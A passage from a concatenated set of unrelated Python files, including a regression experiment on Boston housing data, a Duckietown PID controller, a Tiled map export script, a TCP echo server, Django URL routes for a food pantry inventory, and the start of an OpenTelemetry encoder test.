panorama_private_ip = (eip['primary_private_ip']['value'])
secondary_ip = (eip['secondary_eip']['value'])
secondary_private_ip = (eip['secondary_private_ip']['value'])
poutput = dict()
poutput.update(Primary_IP=panorama_ip)
poutput.update(Secondary_IP=secondary_ip)
poutput.update(Primary_Private_IP=panorama_private_ip)
poutput.update(Secondary_Private_IP=secondary_private_ip)
print(json.dumps(poutput))
sys.exit(0) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/10/1316:45
# @Author : DaiPuWei
# E-Mail : [email protected]
# blog : https://blog.csdn.net/qq_30091945
# @Site : 中国民航大学北教25实验室506
# @File : BostonHousing.py
# @Software: PyCharm
from LinearRegression.LinearRegression import LinearRegression
from LocalWeightedLinearRegression.LocalWeightedLinearRegression \
import LocalWeightedLinearRegression
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_boston
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def Merge(data,col):
"""
这是生成DataFrame数据的函数
:param data:输入数据
:param col:列名称数组
"""
Data = np.array(data).T
return pd.DataFrame(Data,columns=col)
def run_main():
"""
这是主函数
"""
# 导入数据以及划分训练数据与测试数据
InputData, Result = load_boston(return_X_y=True)
# 为了方便实验,只取第6维特征。第6列为平均房间数目
InputData = np.array(InputData)[:,5]
# 保存原始数据集
Data = Merge([InputData,Result],['平均房间数目','房价'])
Data.to_excel('./原始数据.xlsx')
# 改变数据集与真实房价数组的形状
InputData = InputData.reshape((len(InputData), 1))
Result = np.array(Result).reshape((len(Result), 1))
# 解决Matplotlib中的中文乱码问题,以便于后面实验结果可视化
mpl.rcParams['font.sans-serif'] = [u'simHei']
mpl.rcParams['axes.unicode_minus'] = False
# 把数据集分成训练数据集和测试数据集,测试集只占总数据集的10%
train_data,test_data,train_result,test_result = \
train_test_split(InputData,Result,test_size=0.1,random_state=10)
# 利用散点图可视化测试数据集,并保存可视化结果
col = ['真实房价']
plt.scatter(test_data,test_result,alpha=0.5,c='b',s=10)
plt.grid(True)
plt.legend(labels = col,loc='best')
plt.xlabel("房间数")
plt.ylabel("真实房价")
plt.savefig("./测试集可视化.jpg",bbox_inches='tight')
#plt.show()
plt.close()
# 对测试数据集及其真实房价输出进行排序
index = np.argsort(test_data.T[0])
test_data_ = test_data[index]
test_result_ = test_result[index]
# 构建线性回归模型与局部加权线性回归模型
# 定义带宽系数
K = [0.001,0.01,0.1,0.5]
K.extend(list(np.arange(1,201)))
K = np.array(K)
# 定义正则方程优化的线性回归模型
linearregression = LinearRegression(train_data,train_result)
# 定义局部加权线性回归模型
lwlr = LocalWeightedLinearRegression(train_data,train_result)
# 利用测试数据集进行预测
# 线性回归利用正规方程求解模型参数
linearregression.getNormalEquation()
# 得到线性回归模型最佳参数之后,利用测试数据集进行预测,
# 预测结果保存在predict_linearregression,并计算线性回归的预测均方误差loss_LR
predict_LR = linearregression.predict(test_data_)
loss_LR = ((predict_LR-test_result_)**2).T[0]
#print(np.shape(predict_LR))
#print(np.shape(loss_LR))
# 由于局部加权回归算法对于每一组测试数据集,其权重都不一样。因此
# 局部加权回归的最佳模型参数与测试数据相关,因此遍历测试数据集的同时
# 求解最佳参数与预测同时进行。
# 利用测试数据集,进行局部加权线性回归预测,回归预测结果保存
# 在predict_LWLR,预测误差为loss_LWLR
predict_LWLR = []
loss_LWLR = []
for k in K:
predict = lwlr.predict_NormalEquation(test_data_,k)
#print(np.shape(predict))
predict_LWLR.append(predict)
loss_LWLR.append(((predict-test_result_.T[0])**2))
#print(np.shape(predict_LWLR))
#print(np.shape(loss_LWLR))
# 不同带宽系数的局部加权线性回归和线性回归模型预测结果的可视化
plt.scatter(test_data,test_result,alpha=0.5,c='b',s=10)
plt.grid(True)
plt.plot(test_data_.T[0], predict_LR,'r')
plt.legend(labels = ['线性回归'],loc='best')
plt.xlabel("房间数")
plt.ylabel("房价")
plt.savefig("./测试集可视化"+"线性回归.jpg",bbox_inches='tight')
plt.show()
plt.close()
# 遍历每组不同局部加权线性回归算法的预测误差
for (predict_lwlr,k) in zip(predict_LWLR,K):
plt.scatter(test_data, test_result, alpha=0.5, c='b', s=10)
plt.plot(test_data_.T[0], predict_lwlr,'r')
plt.grid(True)
plt.legend(labels=["k="+str(k)], loc='best')
plt.xlabel("房间数")
plt.ylabel("房价")
plt.savefig("./测试集可视化局部加权回归"+str(k)+".jpg", bbox_inches='tight')
plt.close()
# 可视化预测部分结果
# 定义需要可视化的不同带宽系数的局部加权线性回归模型
K_ = np.array([0.1,0.5,2,5,12,25,50,200])
predict_LWLR_tmp = [predict_LWLR[3],predict_LWLR[4],predict_LWLR[6],
predict_LWLR[9],predict_LWLR[16],predict_LWLR[29],
predict_LWLR[54],predict_LWLR[203]]
# 在第一个子图可视化线性回归预测结果
fig = plt.figure()
ax = fig.add_subplot(331)
ax.scatter(test_data,test_result,alpha=0.5,c='b',s=10)
ax.grid(True)
ax.plot(test_data_, predict_LR,'r')
ax.legend(labels = ['线性回归'],loc='best')
plt.xlabel("房间数")
plt.ylabel("房价")
# 遍历局部加权线性回归算法的预测结果
for (index,(predict_lwlr, k)) in enumerate(zip(predict_LWLR_tmp, K_)):
# 在第index+1个子图可视化预测结果
ax = fig.add_subplot(331 + index + 1)
ax.scatter(test_data, test_result, alpha=0.5, c='b', s=10)
ax.grid(True)
ax.plot(test_data_.T[0], predict_lwlr, 'r')
ax.legend(labels=['k='+str(k)], loc='best')
plt.xlabel("房间数")
plt.ylabel("房价")
# 子图之间使用紧致布局
plt.tight_layout()
plt.savefig("./部分预测结果.jpg", bbox_inches='tight')
plt.close()
# 保存不同带宽系数的局部加权线性回归和线性回归模型预测结果
# 定义列名称数组
col = ['真实房价','LinearRegression']
# 遍历带宽系数数组,补全列名称数组
for k in K:
col.append('K=' + str(k))
data = [test_result_.T[0],predict_LR]
# 遍历每种不同带宽系数的局部加权线性回归模型的预测结果
for predict_lwlr in predict_LWLR:
data.append(predict_lwlr)
result = Merge(data,col)
# 保存线性回归与局部加权线性回归预测结果为excel
result.to_excel("./线性回归与局部加权线性回归预测对比.xlsx")
# 保存线性回归与局部加权线性回归预测结果统计信息为excel
result.describe().to_excel("./线性回归与局部加权线性回归预测对比统计信息.xlsx")
# 计算两种模型的均方误差
# 定义列名称数组
col = ['LinearRegression']
# 遍历带宽系数数组,补全列名称数组
for k in K:
col.append('K=' + str(k))
# 定义线性回归与不用带宽系数的局部加权模型误差数组
MSE = [loss_LR]
# 遍历每种不同带宽系数的局部加权线性回归模型的预测结果
for loss in loss_LWLR:
MSE.append(loss)
# 构造DataFrame数据
result = Merge(MSE,col)
# 保存线性回归与局部加权线性回归预测的均方误差为excel
result.to_excel("./线性回归与局部加权线性回归预测的均方误差.xlsx")
# 保存线性回归与局部加权线性回归预测的均方误差的统计信息为excel
information = result.describe()
information.to_excel("./线性回归与局部加权线性回归预测的均方误差对比统计信息.xlsx")
# 可视化不同带宽参数的局部加权线性回归模型在测试集的均方误差和预测标准差
K = list(np.arange(1, 201))
col = ["LWLR-MSE", "LWLR-std"]
LWLR_MSE = list(information.loc['mean'])[5:]
LWLR_std = list(information.loc['std'])[5:]
plt.plot(K, LWLR_MSE,'b')
plt.plot(K, LWLR_std, 'c-.')
plt.grid(True)
plt.legend(labels=col, loc='best')
plt.xlabel("带宽系数")
plt.savefig("./局部加权线性回归的预测均方误差和标准差.jpg", bbox_inches='tight')
#plt.show()
plt.close()
if __name__ == '__main__':
run_main() |
MAXINT = 2 ** 31 - 1
MINIMAL_COST_FOR_LOG = 0.00001
MAX_CUTOFF = 65535
N_TREES = 10
|
'''
Write a program to receive the student ID (guaranteed with eight characters long) and then check
the id code of Faculty of Information by looking at the 3rd and 4th digit codes that are ‘1’ and ‘6’ then
print out the result as an example.
'''
iden = input()
print('yes' if iden[2:4] == '16' else 'no')
|
import logging
import sys
LOG_FORMAT = "%(asctime)s [%(levelname)s] %(name)s: %(message)s"
LOG_LEVEL = logging.DEBUG
LOG_STREAM = sys.stdout
logging.basicConfig(format=LOG_FORMAT, level=LOG_LEVEL, stream=LOG_STREAM)
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
|
import sys
sys.path.append("../")
from duckietown_rl.gym_duckietown.simulator import Simulator
from tutorials.helpers import SteeringToWheelVelWrapper
import csv
# To convert [speed, steering] to wheel velocities: [leftWheelV, rightWheelV]
wrapper = SteeringToWheelVelWrapper()
# Create a list of environment names whose coordinate information will be collected
map_names = ["zigzag_dists", "4way", "loop_empty", "small_loop"]
# Initialize a dictionary where the info will be stored
tile_coords = {map_name: [] for map_name in map_names}
for map in map_names:
env = Simulator(seed=123,
map_name=map, # Choose a map name to start with
max_steps=5000001, # The max. # of steps can be taken before env. resets itself
domain_rand=True, # If true, applies domain randomization
camera_width=640, # Camera width for rendering
camera_height=480, # Camera height for rendering
accept_start_angle_deg=4, # The angle, in degrees, for the agent to turn to get aligned with the right lane's center
full_transparency=True, # If true, makes available for all the env. info to be accessed
distortion=True, # Distorts the image/observation so that it looks like in the real world. Points to sim-2-real problem
randomize_maps_on_reset=False, # If true, maps are randomly chosen after each episode
draw_curve=False, # Draws the right lane's center curve
draw_bbox=False) # Renders the environment in top-down view
# Reset environment for a fresh start & initialize variables
obs = env.reset()
# env.render()
# We only run 1 episode each map and for 2000 steps. 2000 is enough for PID controller to finish the map
EPISODES, STEPS = 1, 2000
for episode in range(0, EPISODES):
# Initialize the list of 10 previous angle errors
prev_angles = [0] * 10
# Initialize the previous angle value
prev_angle = 0
# Initialize a list where all the tile coordinates are stored
_tile_coords = []
for steps in range(0, STEPS):
# Get the position of the agent relative to the center of the right lane
lane_pose = env.get_lane_pos2(env.cur_pos, env.cur_angle)
# Get how far the agent is from the right lane's center
distance_to_road_center = lane_pose.dist
# Get the angle, in radians, that the agent should turn in order to be aligned with the right lane
angle_from_straight_in_rads = lane_pose.angle_rad
# Set PID parameters
k_p, k_d, k_i = 17, 9, 0.1 # 33, 8, 0.1
# Change how fast the agent should drive(speed) & PID parameters when the following conditions occur
if -0.5 < lane_pose.angle_deg < 0.5:
speed = 1
elif -1 < lane_pose.angle_deg < 1:
speed = 0.9
elif -2 < lane_pose.angle_deg < 2:
speed = 0.8
elif -10 < lane_pose.angle_deg < 10:
speed = 0.5
else:
speed = 0.3
# Append the angle error to the list
prev_angles.append(abs(prev_angle - lane_pose.angle_deg))
# Remove the oldest error from the list
prev_angles.pop(0)
# Store the previous angle
prev_angle = lane_pose.angle_deg
# Calculate 'steering' value w.r.t. the PID parameters & the values gathered from the environment
steering = k_p*distance_to_road_center + k_d*angle_from_straight_in_rads + k_i * sum(prev_angles)
# To convert [speed, steering] to wheel velocities: [leftWheelV, rightWheelV]
action = wrapper.convert([speed, steering])
# Apply the action and gather info
obs, reward, done, info = env.step(action)
# env.render()
i, j = env.get_grid_coords(env.cur_pos)
tile_coord = env._get_tile(i, j)['coords']
# Do not add the tile coord. if it has already been added
if tile_coord not in _tile_coords:
_tile_coords.append(tile_coord)
# Uncomment to run frame-by-frame
# cv2.imshow("obs", obs)
# if cv2.waitKey() & 0xFF == ord('q'):
# break
# Add tile coords. to dictionary, if it's not already been done before
if tile_coords[env.map_name] != _tile_coords:
tile_coords[env.map_name] = _tile_coords
env.reset()
print(map)
w = csv.writer(open("tile_coordinates.csv", "w"))
for key, val in tile_coords.items():
w.writerow([key, val])
|
#!/usr/bin/env python3
"""
Script exports map, tilesets
Debuggs map in Tiled program by swapping tilesets
Directory layout of Tiled and Game asset folder
must exactly match to not break referance links
"""
import os
from shutil import copy
from sys import argv
# map_dir: where the game map asset resides
map_dir = "/home/rubsz/Documents/programming/game_dev/Tides_of_war/asset/img/map"
# character_dir: where the game character sprite assets reside
character_dir = "/home/rubsz/Tides_of_war/asset/img/character"
tileset_dir = "tilesets"
dtileset_dir = "debug_tilesets"
# debug_name: placeholder name in res dir for program to know if it's currently using debugging tilesets or not
debug_name = "DEBUG-"
img_ext = ".png"
map_ext = ".tmx"
tileset_ext = ".tsx"
if len(argv) > 1:
arg = argv[1]
if os.path.isfile(arg) and not arg.endswith(map_ext) or os.path.isdir(arg) and arg.endswith(tileset_dir):
print("\n--> EXECUTE IN MAP SCENE\n--> ABORTING OPERATION")
elif os.path.isdir(arg) and len(argv) == 3:
# This is for swapping tilesets
arg = os.path.join(arg, tileset_dir)
if argv[2] == "DEBUG":
dtileset_dir = os.path.join(arg, dtileset_dir)
debug = True
for thing in os.listdir(arg):
if thing.startswith(debug_name):
debug = False
break
if not debug:
for tileset in os.listdir(arg):
if tileset.endswith(img_ext) and tileset.startswith(debug_name):
os.rename(os.path.join(arg, tileset), os.path.join(arg, tileset[len(debug_name):]))
else:
for tileset in os.listdir(arg):
if tileset.endswith(img_ext):
os.rename(os.path.join(arg, tileset), os.path.join(arg, debug_name + tileset))
for dtileset in os.listdir(dtileset_dir):
if os.path.isfile(os.path.join(dtileset_dir, dtileset)):
copy(os.path.join(dtileset_dir, dtileset), os.path.join(arg, dtileset))
print("\n--> DEBUG MAP: %s\n--> PRESS (CTRL-T) TO REFRESH IF HASN'T" % debug)
elif os.path.isdir(argv[2]):
# This is for exporting tilesets
map_dir = os.path.join(map_dir, tileset_dir)
if not os.path.isdir(map_dir):
os.mkdir(map_dir)
for tileset in os.listdir(arg):
if os.path.isfile(os.path.join(arg, tileset)):
copy(os.path.join(arg, tileset), map_dir)
arg = argv[2]
for race in os.listdir(arg):
if os.path.isdir(os.path.join(arg, race)):
for thing in os.listdir(os.path.join(arg, race)):
if thing.endswith(tileset_ext):
copy(os.path.join(arg, race, thing), os.path.join(character_dir, race, thing))
print("\n--> TILESETS EXPORTED TO: %s" % map_dir)
else:
# This is for exporting map
copy(arg, map_dir)
print("\n--> MAP EXPORTED TO: %s" % map_dir)
else:
print("\n--> NEED ARGS FROM TILED TO RUN")
|
from GridGenerator import generate_grid, coord_to_grid
from Discretizer import grid_to_coords |
#!/usr/bin/env python
import os
import sys
import datetime
import time
import socket
def listen_on_tcp_port():
"""listen_on_tcp_port
Run a simple server for processing messages over ``TCP``.
``LISTEN_ON_HOST`` - listen on this host ip address
``LISTEN_ON_PORT`` - listen on this ``TCP`` port
``LISTEN_SIZE`` - listen on to packets of this size
``LISTEN_SLEEP`` - sleep this number of seconds per loop
``LISTEN_SHUTDOWN_HOOK`` - shutdown if file is found on disk
"""
host = os.getenv(
"LISTEN_ON_HOST",
"127.0.0.1").strip().lstrip()
port = int(os.getenv(
"LISTEN_ON_PORT",
"80").strip().lstrip())
backlog = int(os.getenv(
"LISTEN_BACKLOG",
"5").strip().lstrip())
size = int(os.getenv(
"LISTEN_SIZE",
"1024").strip().lstrip())
sleep_in_seconds = float(os.getenv(
"LISTEN_SLEEP",
"0.5").strip().lstrip())
shutdown_hook = os.getenv(
"LISTEN_SHUTDOWN_HOOK",
"/tmp/shutdown-listen-server-{}-{}".format(
host,
port)).strip().lstrip()
if os.path.exists(shutdown_hook):
print(("Please remove the shutdown hook file: "
"\nrm -f {}")
.format(
shutdown_hook))
sys.exit(1)
now = datetime.datetime.now().isoformat()
print(("{} - Starting Server address={}:{} "
"backlog={} size={} sleep={} shutdown={}")
.format(
now,
host,
port,
backlog,
size,
sleep_in_seconds,
shutdown_hook))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(backlog)
msg = 0
while 1:
client, address = s.accept()
send_data = False
data = None
while not data:
data = client.recv(size)
if data:
now = datetime.datetime.now().isoformat()
print(("{} received msg={} "
"data={} replying")
.format(
now,
msg,
data))
msg += 1
if msg > 1000000:
msg = 0
send_data = True
else:
time.sleep(sleep_in_seconds)
if send_data:
client.send(data)
if os.path.exists(shutdown_hook):
now = datetime.datetime.now().isoformat()
print(("{} detected shutdown "
"file={}")
.format(
now,
shutdown_hook))
client.close()
# end of loop
# end of listen_on_tcp_port
if __name__ == '__main__':
listen_on_tcp_port()
|
import os, re
def processFile(file):
if os.path.isfile(file):
f = open(file, mode="r", encoding="utf-8")
lines = f.readlines()
print(len(lines))
for line in lines:
#print(len(line))
sectionRegex = re.compile(r'(\d.\d(.\d)?)\s+([\sa-zA-Z0-9\.\-_\\/,;\?]*)')
match = sectionRegex.search(line)
if match and len(match.groups()) >= 2:
section = match.groups()[0]
print("found: " + section)
parts = section.split(".")
print(parts)
content = match.groups()[2]
print(content)
f.close()
processFile("C:\\Code\\RelatedRecords.Tests\\WpfInterviewer\\text.txt") |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ConfigParser, datetime, locale, time
from datetime import date
locale.setlocale(locale.LC_ALL, '')
CONFIG_FILE = 'config.ini'
config = ConfigParser.ConfigParser()
with open(CONFIG_FILE) as fp:
config.readfp(fp)
class UnrecognizedDateFormatError(Exception):
def __init__(self, message, date):
super(UnrecognizedDateFormatError, self).__init__(message)
self.date = date
def parse_date(date=None):
try:
time_st = time.strptime(date, '%d de %B de %Y')
return datetime.date.fromtimestamp(time.mktime(time_st))
except ValueError:
pass
try:
time_st = time.strptime(date, '%d de %B')
return datetime.date.fromtimestamp(time.mktime(time_st))
except ValueError:
pass
try:
time_st = time.strptime(date, '%Y')
return datetime.date.fromtimestamp(time.mktime(time_st))
except ValueError:
pass
raise UnrecognizedDateFormatError("Could not parse date", date)
|
"""
Manage the urls for the F. P. I. application.
"""
from django.urls import path
from django.views.generic import TemplateView
from fpiweb.views import \
AboutView, \
ActivityDownloadView, \
BoxDetailsView, \
BoxEditView, \
BoxEmptyMoveView, \
BoxEmptyView, \
BoxItemFormView, \
BoxMoveView, \
BoxNewView, \
BoxScannedView, \
BuildPalletView, \
ConstraintCreateView, \
ConstraintDeleteView, \
ConstraintsListView, \
ConstraintUpdateView, \
IndexView, \
LocBinCreateView, \
LocBinDeleteView, \
LocBinListView, \
LocBinUpdateView, \
LocRowCreateView, \
LocRowDeleteView, \
LocRowListView, \
LocRowUpdateView, \
LocTierCreateView, \
LocTierDeleteView, \
LocTierListView, \
LocTierUpdateView, \
LoginView, \
LogoutView, \
MaintenanceView, \
ManualBoxMenuView, \
ManualBoxStatusView, \
ManualCheckinBoxView, \
ManualConsumeBoxView, \
ManualMenuView, \
ManualMoveBoxView, \
ManualNewBoxView, \
ManualPalletMenuView, \
ManualPalletMoveView, \
ManualPalletNew, \
ManualPalletStatus, \
PalletManagementView, \
PalletSelectView, \
PrintLabelsView, \
ScannerView, \
TestScanView
# from fpiweb.views import ConstraintDetailView
__author__ = '(Multiple)'
__project__ = "Food-Pantry-Inventory"
__creation_date__ = "04/01/2019"
# set the namespace for the application
app_name = 'fpiweb'
urlpatterns = [
# index page
# e.g. /fpiweb/ or /fpiweb/index/
path('', IndexView.as_view(), name='index'),
path('index/', IndexView.as_view(), name='index'),
# about page
# e.g. /fpiweb/about/
path('about/', AboutView.as_view(), name='about'),
# login page
# e.g. /fpiweb/login/
path('login/', LoginView.as_view(), name='login'),
# logout page
# e.g. /fpiweb/logout/
path('logout/', LogoutView.as_view(), name='logout'),
# Maintenance page
# e.g. /fpiweb/maintenance/ = list of constraints
path('maintenance/', MaintenanceView.as_view(),
name='maintenance'),
# LocRow List page
# e.g. /fpiweb/loc_rows/ = list of loc_rows
path('loc_row/', LocRowListView.as_view(),
name='loc_row_view'),
# LocRow Add page
# e.g. /fpiweb/loc_row/add/ = add a loc_row
path('loc_row/add/', LocRowCreateView.as_view(),
name='loc_row_new', ),
# LocRow Edit page
# e.g. /fpiweb/loc_row/edit/4/ = edit loc_row # 4
path('loc_row/edit/<int:pk>/', LocRowUpdateView.as_view(),
name='loc_row_update', ),
# LocRow Delete Page
# e.g. /fpiweb/loc_row/delete/4/ = delete loc_row # 4
path('loc_row/delete/<int:pk>/', LocRowDeleteView.as_view(),
name='loc_row_delete', ),
# LocBin List page
# e.g. /fpiweb/loc_bins/ = list of loc_bins
path('loc_bin/', LocBinListView.as_view(),
name='loc_bin_view'),
# LocBin Add page
# e.g. /fpiweb/loc_bin/add/ = add a loc_bin
path('loc_bin/add/', LocBinCreateView.as_view(),
name='loc_bin_new', ),
# LocBin Edit page
# e.g. /fpiweb/loc_bin/edit/4/ = edit loc_bin # 4
path('loc_bin/edit/<int:pk>/', LocBinUpdateView.as_view(),
name='loc_bin_update', ),
# LocBin Delete Page
# e.g. /fpiweb/loc_bin/delete/4/ = delete loc_bin # 4
path('loc_bin/delete/<int:pk>/', LocBinDeleteView.as_view(),
name='loc_bin_delete', ),
# LocTier List page
# e.g. /fpiweb/loc_tiers/ = list of loc_tiers
path('loc_tier/', LocTierListView.as_view(),
name='loc_tier_view'),
# LocTier Add page
# e.g. /fpiweb/loc_tier/add/ = add a loc_tier
path('loc_tier/add/', LocTierCreateView.as_view(),
name='loc_tier_new', ),
# LocTier Edit page
# e.g. /fpiweb/loc_tier/edit/4/ = edit loc_tier # 4
path('loc_tier/edit/<int:pk>/', LocTierUpdateView.as_view(),
name='loc_tier_update', ),
# LocTier Delete Page
# e.g. /fpiweb/loc_tier/delete/4/ = delete loc_tier # 4
path('loc_tier/delete/<int:pk>/', LocTierDeleteView.as_view(),
name='loc_tier_delete', ),
# Constraint List page
# e.g. /fpiweb/constraints/ = list of constraints
path('constraints/', ConstraintsListView.as_view(),
name='constraints_view'),
# Constraint Add page
# e.g. /fpiweb/constraint/add/ = add a constraint
path('constraint/add/', ConstraintCreateView.as_view(),
name='constraint_new', ),
# Constraint Edit page
# e.g. /fpiweb/constraint/edit/4/ = edit constraint # 4
path('constraint/edit/<int:pk>/', ConstraintUpdateView.as_view(),
name='constraint_update', ),
# Constraint Delete Page
# e.g. /fpiweb/constraint/delete/4/ = delete constraint # 4
path('constraint/delete/<int:pk>/', ConstraintDeleteView.as_view(),
name='constraint_delete', ),
# Box Add page
# e.g. /fpiweb/box/add/ = add a box to inventory
path('box/new/<str:box_number>/', BoxNewView.as_view(), name='box_new'),
# Box Edit page
# e.g. /fpiweb/box/<pk>/edit = edit a box in inventory
path('box/<int:pk>/edit/', BoxEditView.as_view(), name='box_edit'),
# Box Detail page
# e.g. /fpiweb/box/<pk>/ = view the information about a box
path('box/<int:pk>/', BoxDetailsView.as_view(), name='box_details'),
# Box scan page (QR code scans will start here)
# e.g. /fpiweb/box/box12345/ = view the information about a box
path('box/box<int:number>/', BoxScannedView.as_view(), name='box_scanned'),
# Move or empty a box
# e.g. /fpiweb/box/<pk>/empty_move = consume or move a box
path('box/<int:pk>/empty_move/', BoxEmptyMoveView.as_view(),
name='box_empty_move'),
# Move a box
# e.g. /fpiweb/box/<pk>/move/ = change location of box in inventory
path('box/<int:pk>/move/', BoxMoveView.as_view(), name='box_move'),
# fill a box
# e.g. /fpiweb/box/<pk>/fill/ = fill an empy box and put in inventory
path('box/<int:pk>/fill/', BoxEmptyMoveView.as_view(), name='box_fill'),
# Empty a box
# e.g. /fpiweb/box/<pk>/empty = consume the product in a box
path('box/<int:pk>/empty/', BoxEmptyMoveView.as_view(), name='box_empty'),
# send scan image or box number to server receive JSON info on box
path('box/box_form/', BoxItemFormView.as_view(), name='box_form'),
# e.g. /fpiweb/test_scan/ = ???
path('test_scan/', TestScanView.as_view(), name='test_scan'),
# Add a box to a pallet view
# e.g. /fpiweb/build_pallet/box/box12345/ = add a box to existing pallet
path(
'build_pallet/<str:box_number>/',
BuildPalletView.as_view(),
{'box_pk': 'pk'},
name='build_pallet_add_box'
),
# Start a new pallet view
# e.g. /fpiweb/build_pallet/ = start a new pallet
path(
'build_pallet/',
BuildPalletView.as_view(),
name='build_pallet'
),
# Manual box management menu
# e.g. /fpiweb/manualmenu/ = show manual box management menu
path(
'manualmenu/',
ManualMenuView.as_view(),
name='manual_menu'
),
# Manual pallet management menu
# e.g. /fpiweb/manualpalletmenu/ = show manual pallet management menu
path('manualpalletmenu/',
ManualPalletMenuView.as_view(),
name='manual_pallet_menu'),
# Manual box management menu
# e.g. /fpiweb/manualboxmenu/ = show manual box management menu
path('manualboxmenu/',
ManualBoxMenuView.as_view(),
name='manual_box_menu'),
# Manually start a new pallet
# e.g. /fpiweb/manualpalletnew = manually starting a new pallet
path(
'manual_pallet_new/',
ManualPalletNew.as_view(),
name='manual_pallet_new'
) ,
path(
'manual_pallet_move/',
ManualPalletMoveView.as_view(),
name='manual_pallet_move',
),
# Manually show the current pallet status
# e.g. /fpiweb/manualpalletstatus/5/ = current pallet status
path(
'manual_pallet_status/<int:pk>',
ManualPalletStatus.as_view(),
name='manual_pallet_status'
),
# Manually ask a question or notify user
# e.g. /fpiweb/manual_note/ = Ask a question or post a note
# path(
# 'manual_question/',
# ManualNotification.as_view(),
# name='manual_question'
# ),
path(
'pallet/management/',
PalletManagementView.as_view(),
name='palletManagement',
),
path('build_pallet/', BuildPalletView.as_view(), name='build_pallet'),
path(
'build_pallet/<int:box_pk>/',
BuildPalletView.as_view(),
name='build_pallet_add_box'),
path('pallet/select/', PalletSelectView.as_view(), name='pallet_select'),
path('scanner/', ScannerView.as_view(), name='scanner'),
path('print_labels/', PrintLabelsView.as_view(), name='print_labels'),
path(
'activity/download/',
ActivityDownloadView.as_view(),
name='download_activities'),
# Manually add an empty box to the inventory system
# e.g. /fpiweb/manual_box_status/ = determine the status of a box manually
path('manual_add_box/', ManualNewBoxView.as_view(),
name='manual_add_box', ),
# Manually check in a box
# e.g. /fpiweb/manual_checkin_box/ = check in a box manually
path(
'manual_checkin_box/',
ManualCheckinBoxView.as_view(),
name='manual_checkin_box',
),
# Manually check out a box
# e.g. /fpiweb/manual_checkout_box/ = check out a box manually
path(
'manual_checkout_box/',
ManualConsumeBoxView.as_view(),
name='manual_checkout_box',
),
# Manually move a filled box
# e.g. /fpiweb/manual_move_box/ = move a filled box manually
path(
'manual_move_box/',
ManualMoveBoxView.as_view(),
name='manual_move_box',
),
# Manually get a box status
# e.g. /fpiweb/manual_box_status/ = determine the status of a box manually
path(
'manual_box_status/',
ManualBoxStatusView.as_view(),
name='manual_box_status',
),
]
|
from PyMesh import unique_rows
from PyMesh import face_normals
from PyMesh import vertex_normals
from PyMesh import edge_normals
from PyMesh import orient_outward
def orient_faces(vertices, faces, outward=True):
oriented_faces = orient_outward(vertices, faces)
if not outward:
reverse_indices = list(reversed(range(faces.shape[1])))
oriented_faces = oriented_faces[:, reverse_indices]
return oriented_faces
|
from django.contrib import admin
from apps.news.models import Newsletter
admin.site.register(Newsletter)
|
from setuptools import setup
setup(name='pyeventick',
version='0.2',
description='Simple integrate of API eventick.com.br with python',
url='https://github.com/hudsonbrendon/pyeventick',
author='Hudson Brendon',
author_email='[email protected]',
license='MIT',
packages=['pyeventick'],
install_requires=[
'requests',
],
zip_safe=False)
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=protected-access
import unittest
from typing import List, Tuple
from opentelemetry.exporter.otlp.proto.http.trace_exporter.encoder import (
_SPAN_KIND_MAP,
_encode_span_id,
_encode_status,
_encode_trace_id,
_ProtobufEncoder,
)
from opentelemetry.proto.collector.trace.v1.trace_service_pb2 import (
ExportTraceServiceRequest as PB2ExportTraceServiceRequest,
)
from opentelemetry.proto.common.v1.common_pb2 import AnyValue as PB2AnyValue
from opentelemetry.proto.common.v1.common_pb2 import (
InstrumentationLibrary as PB2InstrumentationLibrary,
)
from opentelemetry.proto.common.v1.common_pb2 import KeyValue as PB2KeyValue
from opentelemetry.proto.resource.v1.resource_pb2 import (
Resource as PB2Resource,
)
from opentelemetry.proto.trace.v1.trace_pb2 import (
InstrumentationLibrarySpans as PB2InstrumentationLibrarySpans,
)
from opentelemetry.proto.trace.v1.trace_pb2 import (
ResourceSpans as PB2ResourceSpans,
)
from opentelemetry.proto.trace.v1.trace_pb2 import Span as PB2SPan
from opentelemetry.proto.trace.v1.trace_pb2 import Status as PB2Status
from opentelemetry.sdk.trace import Event as SDKEvent
from opentelemetry.sdk.trace import Resource as SDKResource
from opentelemetry.sdk.trace import SpanContext as SDKSpanContext
from opentelemetry.sdk.trace import _Span as SDKSpan
from opentelemetry.sdk.util.instrumentation import (
InstrumentationInfo as SDKInstrumentationInfo,
)
from opentelemetry.trace import Link as SDKLink
from opentelemetry.trace import SpanKind as SDKSpanKind
from opentelemetry.trace import TraceFlags as SDKTraceFlags
from opentelemetry.trace.status import Status as SDKStatus
from opentelemetry.trace.status import StatusCode as SDKStatusCode
class TestProtobufEncoder(unittest.TestCase):
def test_encode(self):
otel_spans, expected_encoding = self.get_exhaustive_test_spans()
self.assertEqual(
_ProtobufEncoder().encode(otel_spans), expected_encoding
)
def test_serialize(self):
otel_spans, expected_encoding = self.get_exhaustive_test_spans()
self.assertEqual(
_ProtobufEncoder().serialize(otel_spans),
expected_encoding.SerializeToString(),
)
def test_content_type(self):
self.assertEqual(
_ProtobufEncoder._CONTENT_TYPE, "application/x-protobuf"
)
@staticmethod
def get_exhaustive_otel_span_list() -> List[SDKSpan]:
trace_id = 0x3E0C63257DE34C926F9EFCD03927272E
base_time = 683647322 * 10 ** 9 # in ns
start_times = (
base_time,
base_time + 150 * 10 ** 6,
base_time + 300 * 10 ** 6,
base_time + 400 * 10 ** 6,
)
end_times = (
start_times[0] + (50 * 10 ** 6),
start_times[1] + (100 * 10 ** 6),
start_times[2] + (200 * 10 ** 6),
start_times[3] + (300 * 10 ** 6),
)
parent_span_context = SDKSpanContext(
trace_id, 0x1111111111111111, is_remote=False
)
other_context = SDKSpanContext(
